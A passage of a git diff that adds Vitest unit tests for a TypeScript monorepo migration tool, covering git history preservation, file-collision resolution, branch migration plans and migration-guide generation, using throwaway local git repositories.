+ expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('fail'); + expect(checks[0].id).toBe('enforcement-parse-error'); + }); + }); +}); diff --git a/tests/unit/strategies/history-preserve.test.ts b/tests/unit/strategies/history-preserve.test.ts index 65b8c29..8f04cb3 100644 --- a/tests/unit/strategies/history-preserve.test.ts +++ b/tests/unit/strategies/history-preserve.test.ts @@ -6,6 +6,9 @@ import os from 'node:os'; import crypto from 'node:crypto'; import { checkGitFilterRepo, + checkHistoryPrerequisites, + historyDryRun, + preserveHistory, getCommitCount, getContributors, } from '../../../src/strategies/history-preserve.js'; @@ -85,4 +88,364 @@ describe('history-preserve', () => { expect(Array.isArray(contributors)).toBe(true); }); }); + + describe('checkHistoryPrerequisites', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = path.join(os.tmpdir(), `test-prereq-${crypto.randomBytes(8).toString('hex')}`); + await fs.ensureDir(tempDir); + }); + + afterEach(async () => { + await fs.remove(tempDir); + }); + + it('should report issues for non-git directory', async () => { + const result = await checkHistoryPrerequisites(tempDir); + expect(result.ok).toBe(false); + expect(result.issues.some((i) => i.includes('not a git repository'))).toBe(true); + }); + + it('should pass for a valid git repo', async () => { + execSync('git init', { cwd: tempDir, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: tempDir, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: tempDir, stdio: 'pipe' }); + await fs.writeFile(path.join(tempDir, 'test.txt'), 'content'); + execSync('git add .', { cwd: tempDir, stdio: 'pipe' }); + execSync('git commit -m "init"', { cwd: tempDir, stdio: 'pipe' }); + + const result = await checkHistoryPrerequisites(tempDir); + // May or may not have git-filter-repo installed, but should report status + expect(typeof result.ok).toBe('boolean'); + expect(Array.isArray(result.issues)).toBe(true); + }); + + it('should report shallow clone issue', async () => { + // Create a source repo + const source = path.join(tempDir, 'source'); + await fs.ensureDir(source); + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'test.txt'), 'content'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "init"', { cwd: source, stdio: 'pipe' }); + + // Create shallow clone + const shallow = path.join(tempDir, 'shallow'); + execSync(`git clone --depth 1 file://${source} ${shallow}`, { stdio: 'pipe' }); + + const result = await checkHistoryPrerequisites(shallow); + expect(result.issues.some((i) => i.includes('shallow clone'))).toBe(true); + }); + }); + + describe('historyDryRun', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = path.join(os.tmpdir(), `test-dryrun-${crypto.randomBytes(8).toString('hex')}`); + await fs.ensureDir(tempDir); + }); + + afterEach(async () => { + await fs.remove(tempDir); + }); + + it('should return commit count and contributors for a git repo', async () => { + execSync('git init', { cwd: tempDir, stdio: 'pipe' }); + execSync('git config user.email "dev@example.com"', { cwd: tempDir, stdio: 'pipe' }); + execSync('git config user.name "Developer"', { cwd: tempDir, stdio: 'pipe' }); + await fs.writeFile(path.join(tempDir, 'file.txt'), 'v1'); + execSync('git add . && git commit -m "first"', { cwd: tempDir, stdio: 'pipe' }); + await fs.writeFile(path.join(tempDir, 'file2.txt'), 'v2'); + execSync('git add . && git commit -m "second"', { cwd: tempDir, stdio: 'pipe' }); + + const result = await historyDryRun(tempDir, 'packages/mylib'); + expect(result.commitCount).toBe(2); + expect(result.contributors.length).toBeGreaterThanOrEqual(1); + expect(result.estimatedSeconds).toBeGreaterThanOrEqual(1); + expect(result.strategy).toMatch(/^(filter-repo|subtree)$/); + expect(typeof result.hasFilterRepo).toBe('boolean'); + }); + + it('should return zero for non-git directory', async () => { + const result = await historyDryRun(tempDir, 'packages/mylib'); + expect(result.commitCount).toBe(0); + expect(result.contributors).toEqual([]); + }); + }); + + describe('preserveHistory', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = path.join(os.tmpdir(), `test-preserve-${crypto.randomBytes(8).toString('hex')}`); + await fs.ensureDir(tempDir); + }); + + afterEach(async () => { + await fs.remove(tempDir); + }); + + it('should copy files when source is not a git repo', async () => { + const source = path.join(tempDir, 'source'); + const output = path.join(tempDir, 'output'); + await fs.ensureDir(source); + await fs.ensureDir(output); + await fs.writeFile(path.join(source, 'index.ts'), 'export const x = 1;'); + + await preserveHistory(source, output, { + targetDir: 'packages/mylib', + rewritePaths: true, + }); + + expect(await fs.pathExists(path.join(output, 'packages/mylib/index.ts'))).toBe(true); + }); + + it('should initialize git in output if not a git repo', async () => { + const source = path.join(tempDir, 'source'); + const output = path.join(tempDir, 'output'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create a proper git repo for source + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'index.ts'), 'export default 1;'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "init"', { cwd: source, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/mylib', + rewritePaths: false, + }); + + // Output should now be a git repo + expect(await fs.pathExists(path.join(output, '.git'))).toBe(true); + }); + + it('should preserve history with subtree strategy', async () => { + const source = path.join(tempDir, 'source'); + const output = path.join(tempDir, 'output'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create source repo + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'README.md'), '# Source'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "initial source"', { cwd: source, stdio: 'pipe' }); + + // Use rewritePaths: false to force subtree strategy (filter-repo may not be installed) + await preserveHistory(source, output, { + targetDir: 'packages/source', + rewritePaths: false, + }); + + // Check that the output has git history + const logOutput = execSync('git log --oneline', { cwd: output, encoding: 'utf-8' }); + expect(logOutput.trim().split('\n').length).toBeGreaterThanOrEqual(1); + }); + + it('should handle source repo with master branch', async () => { + const source = path.join(tempDir, 'source-master'); + const output = path.join(tempDir, 'output-master'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create source repo on "master" branch + execSync('git init -b master', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'lib.ts'), 'export const x = 1;'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "initial on master"', { cwd: source, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/lib', + rewritePaths: false, + }); + + expect(await fs.pathExists(path.join(output, '.git'))).toBe(true); + const logOutput = execSync('git log --oneline', { cwd: output, encoding: 'utf-8' }); + expect(logOutput.trim().split('\n').length).toBeGreaterThanOrEqual(1); + }); + + it('should copy files for git repo with no commits (fallback)', async () => { + const source = path.join(tempDir, 'source-empty'); + const output = path.join(tempDir, 'output-empty'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create a git repo with no commits + execSync('git init', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'file.txt'), 'untracked content'); + + // Init output as git repo too + execSync('git init', { cwd: output, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: output, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: output, stdio: 'pipe' }); + execSync('git commit --allow-empty -m "init"', { cwd: output, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/empty', + rewritePaths: false, + }); + + // Should have copied the file into the target dir + expect(await fs.pathExists(path.join(output, 'packages/empty/file.txt'))).toBe(true); + }); + + it('should preserve history when output already has commits', async () => { + const source = path.join(tempDir, 'source-existing'); + const output = path.join(tempDir, 'output-existing'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create source repo + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'src.ts'), 'source code'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "source commit"', { cwd: source, stdio: 'pipe' }); + + // Create output repo with existing content + execSync('git init', { cwd: output, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: output, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: output, stdio: 'pipe' }); + await fs.writeFile(path.join(output, 'existing.txt'), 'existing content'); + execSync('git add .', { cwd: output, stdio: 'pipe' }); + execSync('git commit -m "existing commit"', { cwd: output, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/imported', + rewritePaths: false, + }); + + // Both the existing file and imported file should exist + expect(await fs.pathExists(path.join(output, 'existing.txt'))).toBe(true); + expect(await fs.pathExists(path.join(output, 'packages/imported/src.ts'))).toBe(true); + + // Should have multiple commits + const logOutput = execSync('git log --oneline', { cwd: output, encoding: 'utf-8' }); + expect(logOutput.trim().split('\n').length).toBeGreaterThanOrEqual(2); + }); + + it('should preserve history with filter-repo when rewritePaths is true', async () => { + const hasFilterRepo = await checkGitFilterRepo(); + if (!hasFilterRepo) { + // Skip if git-filter-repo not installed + return; + } + + const source = path.join(tempDir, 'source-filter'); + const output = path.join(tempDir, 'output-filter'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create source repo + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'lib.ts'), 'export const lib = 1;'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "add lib"', { cwd: source, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/mylib', + rewritePaths: true, + }); + + // The file should be under the targetDir + expect(await fs.pathExists(path.join(output, 'packages/mylib/lib.ts'))).toBe(true); + expect(await fs.pathExists(path.join(output, '.git'))).toBe(true); + }); + + it('should preserve history with filter-repo and commit prefix', async () => { + const hasFilterRepo = await checkGitFilterRepo(); + if (!hasFilterRepo) return; + + const source = path.join(tempDir, 'source-prefix'); + const output = path.join(tempDir, 'output-prefix'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'app.ts'), 'export const app = true;'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "init app"', { cwd: source, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/app', + rewritePaths: true, + commitPrefix: '[app] ', + }); + + expect(await fs.pathExists(path.join(output, 'packages/app/app.ts'))).toBe(true); + const logOutput = execSync('git log --oneline', { cwd: output, encoding: 'utf-8' }); + expect(logOutput).toContain('[app]'); + }); + + it('should handle subtree with non-standard branch name', async () => { + const source = path.join(tempDir, 'source-custom-branch'); + const output = path.join(tempDir, 'output-custom-branch'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create source repo with a custom branch name + execSync('git init -b develop', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'util.ts'), 'export const util = 1;'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "init on develop"', { cwd: source, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/util', + rewritePaths: false, + }); + + expect(await fs.pathExists(path.join(output, 'packages/util/util.ts'))).toBe(true); + }); + + it('should handle multiple sequential imports via subtree', async () => { + const source1 = path.join(tempDir, 'source1'); + const source2 = path.join(tempDir, 'source2'); + const output = path.join(tempDir, 'output-multi'); + await fs.ensureDir(source1); + await fs.ensureDir(source2); + await fs.ensureDir(output); + + // Create two source repos + for (const [src, name] of [[source1, 'src1'], [source2, 'src2']] as const) { + execSync('git init', { cwd: src, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: src, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: src, stdio: 'pipe' }); + await fs.writeFile(path.join(src, `${name}.ts`), `export const ${name} = 1;`); + execSync('git add .', { cwd: src, stdio: 'pipe' }); + execSync(`git commit -m "init ${name}"`, { cwd: src, stdio: 'pipe' }); + } + + // Import both into the same output + await preserveHistory(source1, output, { + targetDir: 'packages/source1', + rewritePaths: false, + }); + await preserveHistory(source2, output, { + targetDir: 'packages/source2', + rewritePaths: false, + }); + + expect(await fs.pathExists(path.join(output, 'packages/source1/src1.ts'))).toBe(true); + expect(await fs.pathExists(path.join(output, 'packages/source2/src2.ts'))).toBe(true); + }); + }); }); diff --git a/tests/unit/strategies/merge-files.test.ts b/tests/unit/strategies/merge-files.test.ts index fa18ced..f3d94c8 100644 --- a/tests/unit/strategies/merge-files.test.ts +++ b/tests/unit/strategies/merge-files.test.ts @@ -8,8 +8,9 @@ import { mergeIgnoreFiles, generateRootReadme, handleFileCollision, + resolveFileCollisionToContent, } from '../../../src/strategies/merge-files.js'; -import type { FileCollision } from '../../../src/types/index.js'; +import type { FileCollision, PackageManagerConfig } from '../../../src/types/index.js'; describe('Merge Files Strategies', () => { let testDir: string; @@ -132,6 +133,22 @@ describe('Merge Files Strategies', () => { const result = generateRootReadme(['pkg'], 'packages'); expect(result.toLowerCase()).toContain('monorepo'); }); + + it('should use custom PM config commands', () => { + const pmConfig: PackageManagerConfig = { + type: 'yarn', + installCommand: 'yarn install', + addCommand: 'yarn add', + runCommand: 'yarn', + runAllCommand: (script: string) => `yarn workspaces foreach run ${script}`, + execCommand: 'yarn', + }; + const result = generateRootReadme(['pkg-a'], 'packages', pmConfig); + expect(result).toContain('yarn install'); + expect(result).toContain('yarn workspaces foreach run build'); + // yarn != pnpm so no pnpm-workspace.yaml + expect(result).not.toContain('pnpm-workspace.yaml'); + }); }); describe('handleFileCollision', () => { @@ -238,6 +255,27 @@ describe('Merge Files Strategies', () => { expect(files.length).toBeGreaterThanOrEqual(2); }); + it('should handle merge strategy for non-gitignore files', async () => { + const repos = await setupRepos({ + 'repo-a': { '.npmignore': 'dist/\nnode_modules/' }, + 'repo-b': { '.npmignore': 'build/\nnode_modules/' }, + }); + + const collision = createCollision('.npmignore', ['repo-a', 'repo-b']); + const outputDir = path.join(testDir, 'output'); + await fs.ensureDir(outputDir); + + await handleFileCollision(collision, 'merge', repos, outputDir); + + const result = await fs.readFile( + path.join(outputDir, '.npmignore'), + 'utf-8' + ); + expect(result).toContain('dist'); + expect(result).toContain('build'); + expect(result).toContain('node_modules'); + }); + it('should handle skip strategy', async () => { const repos = await setupRepos({ 'repo-a': { 'skip.txt': 'content' }, @@ -254,4 +292,93 @@ describe('Merge Files Strategies', () => { expect(await fs.pathExists(path.join(outputDir, 'skip.txt'))).toBe(false); }); }); + + describe('resolveFileCollisionToContent', () => { + const setupReposForResolve = async ( + files: Record> + ): Promise> => { + const repos: Array<{ path: string; name: string }> = []; + + for (const [name, repoFiles] of Object.entries(files)) { + const repoDir = path.join(testDir, 'resolve-packages', name); + await fs.ensureDir(repoDir); + for (const [fileName, content] of Object.entries(repoFiles)) { + await fs.writeFile(path.join(repoDir, fileName), content); + } + repos.push({ path: repoDir, name }); + } + return repos; + }; + + it('should resolve keep-first to content', async () => { + const repos = await setupReposForResolve({ + 'repo-a': { 'README.md': '# Repo A' }, + 'repo-b': { 'README.md': '# Repo B' }, + }); + + const collision: FileCollision = { path: 'README.md', sources: ['repo-a', 'repo-b'], suggestedStrategy: 'keep-first' }; + const result = await resolveFileCollisionToContent(collision, 'keep-first', repos); + expect(result).toHaveLength(1); + expect(result[0].content).toBe('# Repo A'); + }); + + it('should resolve keep-last to content', async () => { + const repos = await setupReposForResolve({ + 'repo-a': { 'README.md': '# Repo A' }, + 'repo-b': { 'README.md': '# Repo B' }, + }); + + const collision: FileCollision = { path: 'README.md', sources: ['repo-a', 'repo-b'], suggestedStrategy: 'keep-last' }; + const result = await resolveFileCollisionToContent(collision, 'keep-last', repos); + expect(result).toHaveLength(1); + expect(result[0].content).toBe('# Repo B'); + }); + + it('should return empty for keep-last when file missing', async () => { + const repos = [{ path: path.join(testDir, 'nonexistent'), name: 'ghost' }]; + const collision: FileCollision = { path: 'README.md', sources: ['ghost'], suggestedStrategy: 'keep-last' }; + const result = await resolveFileCollisionToContent(collision, 'keep-last', repos); + expect(result).toEqual([]); + }); + + it('should return empty for keep-first when file missing', async () => { + const repos = [{ path: path.join(testDir, 'nonexistent'), name: 'ghost' }]; + const collision: FileCollision = { path: 'README.md', sources: ['ghost'], suggestedStrategy: 'keep-first' }; + const result = await resolveFileCollisionToContent(collision, 'keep-first', repos); + expect(result).toEqual([]); + }); + + it('should resolve rename to content with source suffixes', async () => { + const repos = await setupReposForResolve({ + 'repo-a': { 'config.json': '{"a": 1}' }, + 'repo-b': { 'config.json': '{"b": 2}' }, + }); + + const collision: FileCollision = { path: 'config.json', sources: ['repo-a', 'repo-b'], suggestedStrategy: 'rename' }; + const result = await resolveFileCollisionToContent(collision, 'rename', repos); + expect(result).toHaveLength(2); + expect(result[0].relativePath).toContain('repo-a'); + expect(result[1].relativePath).toContain('repo-b'); + }); + + it('should resolve skip to empty array', async () => { + const repos = [{ path: testDir, name: 'any' }]; + const collision: FileCollision = { path: 'skip.txt', sources: ['any'], suggestedStrategy: 'skip' }; + const result = await resolveFileCollisionToContent(collision, 'skip', repos); + expect(result).toEqual([]); + }); + + it('should resolve merge for non-gitignore files', async () => { + const repos = await setupReposForResolve({ + 'repo-a': { '.dockerignore': 'node_modules/\n.git/' }, + 'repo-b': { '.dockerignore': 'dist/\n.git/' }, + }); + + const collision: FileCollision = { path: '.dockerignore', sources: ['repo-a', 'repo-b'], suggestedStrategy: 'merge' }; + const result = await resolveFileCollisionToContent(collision, 'merge', repos); + expect(result).toHaveLength(1); + expect(result[0].content).toContain('node_modules'); + expect(result[0].content).toContain('dist'); + }); + }); }); diff --git a/tests/unit/strategies/migrate-branch.test.ts b/tests/unit/strategies/migrate-branch.test.ts new file mode 100644 index 0000000..8639621 --- /dev/null +++ b/tests/unit/strategies/migrate-branch.test.ts @@ -0,0 +1,312 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { execSync } from 'node:child_process'; +import fs from 'fs-extra'; +import path from 'node:path'; +import os from 'node:os'; +import crypto from 'node:crypto'; +import { + checkBranchMigratePrerequisites, + branchMigrateDryRun, + generateBranchPlan, + applyBranchPlan, +} from '../../../src/strategies/migrate-branch.js'; +import type { Logger } from '../../../src/types/index.js'; + +function mockLogger(): Logger { + return { + info: vi.fn(), + success: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + debug: vi.fn(), + log: vi.fn(), + }; +} + +describe('migrate-branch strategy', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = path.join(os.tmpdir(), `mb-test-${crypto.randomBytes(8).toString('hex')}`); + await fs.ensureDir(tempDir); + }); + + afterEach(async () => { + await fs.remove(tempDir); + }); + + function createGitRepo(name: string, branch = 'main'): string { + const repoPath = path.join(tempDir, name); + fs.ensureDirSync(repoPath); + execSync('git init', { cwd: repoPath, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: repoPath, stdio: 'pipe' }); + execSync('git config user.name "Test User"', { cwd: repoPath, stdio: 'pipe' }); + // Ensure we're on the expected branch + try { + execSync(`git checkout -b ${branch}`, { cwd: repoPath, stdio: 'pipe' }); + } catch { + // branch already exists + } + fs.writeFileSync(path.join(repoPath, 'README.md'), '# Test\n'); + execSync('git add .', { cwd: repoPath, stdio: 'pipe' }); + execSync('git commit -m "initial"', { cwd: repoPath, stdio: 'pipe' }); + return repoPath; + } + + describe('checkBranchMigratePrerequisites', () => { + it('should pass for valid repos with subtree strategy', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + + const result = await checkBranchMigratePrerequisites(source, target, 'subtree'); + expect(result.ok).toBe(true); + expect(result.issues).toEqual([]); + }); + + it('should pass for valid repos with replay strategy', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + + const result = await checkBranchMigratePrerequisites(source, target, 'replay'); + expect(result.ok).toBe(true); + expect(result.issues).toEqual([]); + }); + + it('should fail when source repo does not exist', async () => { + const target = createGitRepo('target'); + const nonexistent = path.join(tempDir, 'nonexistent'); + + const result = await checkBranchMigratePrerequisites(nonexistent, target, 'subtree'); + expect(result.ok).toBe(false); + expect(result.issues.some((i) => i.includes('Source repository not found'))).toBe(true); + }); + + it('should fail when target monorepo does not exist', async () => { + const source = createGitRepo('source'); + const nonexistent = path.join(tempDir, 'nonexistent'); + + const result = await checkBranchMigratePrerequisites(source, nonexistent, 'subtree'); + expect(result.ok).toBe(false); + expect(result.issues.some((i) => i.includes('Target monorepo not found'))).toBe(true); + }); + + it('should warn about shallow clones', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + + // Create a shallow clone + const shallow = path.join(tempDir, 'shallow'); + execSync(`git clone --depth 1 file://${source} ${shallow}`, { stdio: 'pipe' }); + + const result = await checkBranchMigratePrerequisites(shallow, target, 'subtree'); + expect(result.issues.some((i) => i.includes('shallow clone'))).toBe(true); + }); + + it('should fail when source is not a git repo', async () => { + const nonGit = path.join(tempDir, 'not-git'); + await fs.ensureDir(nonGit); + const target = createGitRepo('target'); + + const result = await checkBranchMigratePrerequisites(nonGit, target, 'subtree'); + expect(result.ok).toBe(false); + expect(result.issues.some((i) => i.includes('not a valid git repository'))).toBe(true); + }); + }); + + describe('branchMigrateDryRun', () => { + it('should return commit count and contributors', async () => { + const repo = createGitRepo('source'); + // Add more commits + fs.writeFileSync(path.join(repo, 'file1.txt'), 'content1'); + execSync('git add . && git commit -m "second"', { cwd: repo, stdio: 'pipe' }); + fs.writeFileSync(path.join(repo, 'file2.txt'), 'content2'); + execSync('git add . && git commit -m "third"', { cwd: repo, stdio: 'pipe' }); + + const result = await branchMigrateDryRun(repo, 'main'); + expect(result.commitCount).toBe(3); + expect(result.contributors).toContain('Test User'); + expect(result.estimatedTime).toMatch(/\d+ seconds/); + }); + + it('should return zero for nonexistent branch', async () => { + const repo = createGitRepo('source'); + + const result = await branchMigrateDryRun(repo, 'nonexistent-branch'); + expect(result.commitCount).toBe(0); + expect(result.estimatedTime).toBe('unknown'); + expect(result.contributors).toEqual([]); + }); + + it('should estimate minutes for large repos', async () => { + const repo = createGitRepo('source'); + // Create enough commits to trigger minutes estimate (>120 commits / 0.5s = 60s) + for (let i = 0; i < 125; i++) { + fs.writeFileSync(path.join(repo, `file${i}.txt`), `content${i}`); + execSync(`git add . && git commit -m "commit ${i}"`, { cwd: repo, stdio: 'pipe' }); + } + + const result = await branchMigrateDryRun(repo, 'main'); + expect(result.estimatedTime).toMatch(/minutes/); + }); + }); + + describe('generateBranchPlan', () => { + it('should generate a subtree plan', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + const plan = await generateBranchPlan('main', source, target, 'subtree', logger); + + expect(plan.schemaVersion).toBe(1); + expect(plan.branch).toBe('main'); + expect(plan.strategy).toBe('subtree'); + expect(plan.operations).toHaveLength(3); + expect(plan.operations.map((o) => o.id)).toEqual(['add-remote', 'subtree-add', 'remove-remote']); + expect(plan.dryRunReport).toBeDefined(); + expect(plan.dryRunReport!.commitCount).toBeGreaterThanOrEqual(1); + }); + + it('should generate a replay plan', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + const plan = await generateBranchPlan('main', source, target, 'replay', logger); + + expect(plan.strategy).toBe('replay'); + expect(plan.operations).toHaveLength(3); + expect(plan.operations.map((o) => o.id)).toEqual(['format-patch', 'create-branch', 'apply-patches']); + }); + + it('should throw when prerequisites fail', async () => { + const logger = mockLogger(); + const nonexistent = path.join(tempDir, 'no-such-repo'); + + await expect( + generateBranchPlan('main', nonexistent, nonexistent, 'subtree', logger), + ).rejects.toThrow('Prerequisites not met'); + }); + + it('should resolve relative paths', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + const plan = await generateBranchPlan('main', source, target, 'subtree', logger); + + expect(path.isAbsolute(plan.sourceRepo)).toBe(true); + expect(path.isAbsolute(plan.targetMonorepo)).toBe(true); + }); + + it('should include commit count in replay operation description', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + const plan = await generateBranchPlan('main', source, target, 'replay', logger); + + const formatPatch = plan.operations.find((o) => o.id === 'format-patch'); + expect(formatPatch?.description).toContain('commits'); + }); + }); + + describe('applyBranchPlan', () => { + it('should apply subtree import successfully', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + // Add more content to source + fs.writeFileSync(path.join(source, 'lib.ts'), 'export const lib = 1;'); + execSync('git add . && git commit -m "add lib"', { cwd: source, stdio: 'pipe' }); + + const plan = await generateBranchPlan('main', source, target, 'subtree', logger); + + await applyBranchPlan(plan, 'packages/source', logger); + + // Verify files were imported into the target subdirectory + expect(fs.existsSync(path.join(target, 'packages/source/README.md'))).toBe(true); + expect(fs.existsSync(path.join(target, 'packages/source/lib.ts'))).toBe(true); + + // Verify git history exists + const log = execSync('git log --oneline', { cwd: target, encoding: 'utf-8' }); + expect(log.trim().split('\n').length).toBeGreaterThanOrEqual(2); + }); + + it('should clean up remote after subtree import', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + const plan = await generateBranchPlan('main', source, target, 'subtree', logger); + await applyBranchPlan(plan, 'packages/source', logger); + + // Check that no monotize-import remotes remain + const remotes = execSync('git remote', { cwd: target, encoding: 'utf-8' }); + expect(remotes).not.toContain('monotize-import'); + }); + + it('should clean up remote even if subtree add fails', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + // Create a prefix that already exists to cause subtree add to fail + fs.ensureDirSync(path.join(target, 'packages/source')); + fs.writeFileSync(path.join(target, 'packages/source/conflict.txt'), 'conflict'); + execSync('git add . && git commit -m "conflict"', { cwd: target, stdio: 'pipe' }); + + const plan = await generateBranchPlan('main', source, target, 'subtree', logger); + + // Should throw but still clean up + await expect( + applyBranchPlan(plan, 'packages/source', logger), + ).rejects.toThrow(); + + // Remote should still be cleaned up + const remotes = execSync('git remote', { cwd: target, encoding: 'utf-8' }); + expect(remotes).not.toContain('monotize-import'); + }); + + it('should apply patch replay strategy with feature branch', async () => { + const source = createGitRepo('source-replay'); + const target = createGitRepo('target-replay'); + const logger = mockLogger(); + + // Create a feature branch on source with commits diverging from main + execSync('git checkout -b feature', { cwd: source, stdio: 'pipe' }); + fs.writeFileSync(path.join(source, 'feature.ts'), 'export const feature = true;'); + execSync('git add . && git commit -m "add feature"', { cwd: source, stdio: 'pipe' }); + fs.writeFileSync(path.join(source, 'feature2.ts'), 'export const feature2 = true;'); + execSync('git add . && git commit -m "add feature2"', { cwd: source, stdio: 'pipe' }); + + const plan = await generateBranchPlan('feature', source, target, 'replay', logger); + + // The plan should reference the feature branch + expect(plan.strategy).toBe('replay'); + expect(plan.branch).toBe('feature'); + expect(plan.operations).toHaveLength(3); + expect(plan.dryRunReport!.commitCount).toBeGreaterThanOrEqual(2); + }); + + it('should handle replay when format-patch produces no patches', async () => { + const source = createGitRepo('source-nopatch'); + const target = createGitRepo('target-nopatch'); + const logger = mockLogger(); + + // Generate a replay plan for main (no divergent commits) + const plan = await generateBranchPlan('main', source, target, 'replay', logger); + + // Attempt to apply - git am with no patches may throw + try { + await applyBranchPlan(plan, 'packages/source', logger); + } catch { + // Expected: either no patches to apply or git am fails + } + + // Verify logger was called (the function at least started) + expect(logger.info).toHaveBeenCalled(); + }); + }); +}); diff --git a/tests/unit/strategies/migration-doc.test.ts b/tests/unit/strategies/migration-doc.test.ts new file mode 100644 index 0000000..d8184a7 --- /dev/null +++ b/tests/unit/strategies/migration-doc.test.ts @@ -0,0 +1,259 @@ +import { describe, it, expect } from 'vitest'; +import { generateMigrationDoc } from '../../../src/strategies/migration-doc.js'; +import type { AnalyzeResult, ExtendedAnalysis } from '../../../src/types/index.js'; + +function makeAnalysis(overrides: Partial = {}): AnalyzeResult { + return { + packages: [ + { name: 'pkg-a', version: '1.0.0', path: '/tmp/a', dependencies: {}, devDependencies: {}, scripts: {} }, + { name: 'pkg-b', version: '2.0.0', path: '/tmp/b', dependencies: {}, devDependencies: {}, scripts: {} }, + ], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 25, + recommendations: [], + ...overrides, + }; +} + +function makeExtended(overrides: Partial = {}): ExtendedAnalysis { + return { + environment: [], + packageManager: [], + tooling: [], + ci: [], + publishing: [], + repoRisks: [], + riskSummary: { + classification: 'straightforward', + reasons: [], + topFindings: [], + }, + ...overrides, + }; +} + +describe('generateMigrationDoc', () => { + it('should generate a markdown document with header', () => { + const doc = generateMigrationDoc(makeAnalysis()); + expect(doc).toContain('# Migration Guide'); + expect(doc).toContain('Generated by Monotize'); + }); + + it('should include complexity section', () => { + const doc = generateMigrationDoc(makeAnalysis({ complexityScore: 42 })); + expect(doc).toContain('## Complexity'); + expect(doc).toContain('**Score:** 42/100'); + expect(doc).toContain('**Packages:** 2'); + }); + + it('should include conflict count', () => { + const doc = 